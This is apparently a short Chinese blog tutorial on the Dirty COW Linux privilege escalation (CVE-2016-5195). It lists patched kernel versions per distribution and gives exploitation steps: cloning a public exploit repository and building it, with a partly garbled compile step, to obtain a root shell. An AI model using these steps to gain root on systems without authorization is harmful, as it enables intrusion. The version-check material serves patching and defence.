脏牛Linux本地提权漏洞(CVE-2016-5195)

 

漏洞编号：CVE-2016-5195
漏洞名称：脏牛（Dirty COW）
漏洞危害：低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权
影响范围：Linux内核>=2.6.22（2007年发行）开始就受影响了，直到2016年10月18日才修复。

一、检查内核版本

通过uname -a 命令，查看内核版本：

主流发行版修复之后的内核版本，如果你的内核版本低于列表里的版本，表示还存在脏牛漏洞。

?

1 2 3 4 5 6 7

Centos7 /RHEL7    3.10.0-327.36.3.el7 Cetnos6/RHEL6     2.6.32-642.6.2.el6 Ubuntu 16.10         4.8.0-26.28 Ubuntu 16.04         4.4.0-45.66 Ubuntu 14.04         3.13.0-100.147 Debian 8                3.16.36-1+deb8u2 Debian 7                3.2.82-1

 

二、漏洞利用

1、exp下载

git clone https://github.com/gbonacini/CVE-2016-5195.git

2、编译，生成可执行文件

?

1 2	sudo apt-get install g++ make

3、执行成功，返回一个root权限的shell